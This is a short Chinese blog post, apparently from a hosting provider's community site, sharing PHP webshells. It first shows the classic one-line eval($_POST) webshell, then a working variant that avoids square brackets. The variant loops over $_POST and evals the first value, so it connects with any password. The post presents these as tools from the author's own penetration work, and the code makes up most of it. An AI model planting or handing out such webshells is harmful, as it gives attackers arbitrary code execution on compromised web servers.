温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

php无[]shell分享

发布时间:2020-07-08 06:37:01 来源:网络 阅读:524 作者:z2pp 栏目:开发技术

前段时间做测试时候研究出来的,忘记截图了。

当时的环境是没waf,上传了一个php的webshell,但是连接时提示[]有问题,当时用的是传统的一句话

<?php eval($_POST['xxx']);?>

测试了一会,还是不行,尝试使用了另一个php文件,看看是不是网站解析有问题

<?php phpinfo();?>

是可以正常显示的,那么问题点在post数组中括号出了问题,所以需要一个不使用中括号的webshell,研究了一会写出了以下的webshell,不需要中括号,任意密码即可连接

<?
	$code = '';
	foreach($_POST as $a){
		$code = $a;    //取出post数组第一个值
		break;         //直接跳出循环
	}
	eval($code);           //执行了第一个post数组的值
?>

任意密码连接

php无[]shell分享


错误之处,敬请指正

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI